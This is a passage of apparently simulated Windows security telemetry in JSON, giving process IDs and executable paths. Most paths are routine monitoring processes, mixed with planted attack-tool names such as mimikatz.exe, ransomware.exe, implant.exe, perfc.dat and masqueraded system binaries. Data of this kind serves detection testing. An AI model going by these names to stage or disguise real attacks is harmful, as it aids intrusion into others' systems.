",\"0x1258\",\"0xf94\",\"0x123c\",\"0x11e4\",\"0xa08\",\"0x125c\",\"0x10f4\",\"0x1020\",\"0x638\",\"0x10cc\",\"0x107c\",\"0x1064\",\"0x1220\",\"0x1258\",\"0xab8\",\"0xbd8\",\"0x123c\",\"0xcd8\",\"0xd14\",\"0xa10\",\"0x1298\",\"0xac4\",\"0x364\",\"0x1128\",\"0xc54\",\"0x12e8\",\"0x17fc\",\"0x17f0\",\"0x1434\",\"0x1404\",\"0x13a4\",\"0x10f4\",\"0x11e8\",\"0x364\",\"0xc08\",\"0x338\",\"0xfbc\",\"0x640\",\"0x1320\",\"0x13b0\",\"0x1388\",\"0x11c8\",\"0x544\",\"0x894\",\"0xde8\",\"0x778\",\"0x2f8\",\"0x364\",\"0x1c4\",\"0x99c\",\"0x10c8\",\"0x13e0\",\"0x1550\",\"0x15d0\",\"0x13b4\",\"0x16d0\",\"0x11a8\",\"0x244\",\"0x1050\",\"0x690\",\"0xb8\",\"0x1364\",\"0x1148\",\"0x10e0\",\"0x12fc\",\"0x5cc\",\"0x518\",\"0xf84\",\"0xd64\",\"0xc18\",\"0xb50\",\"0x10a4\",\"0x13b4\",\"0xe3c\",\"0xd64\",\"0xc18\",\"0x10e0\",\"0x108c\",\"0x28c\",\"0x11b4\",\"0xddc\",\"0xbe8\",\"0x130c\",\"0x1040\",\"0x1370\",\"0x8e4\",\"0x10fc\",\"0x1298\",\"0x7f8\",\"0xf94\",\"0xc18\",\"0xa84\",\"0x1348\",\"0xe34\",\"0x11b4\",\"0x13b4\",\"0x1148\",\"0xde8\",\"0xc08\",\"0x1338\",\"0xb8\",\"0x6d4\"],\"NewProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\Temp\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program 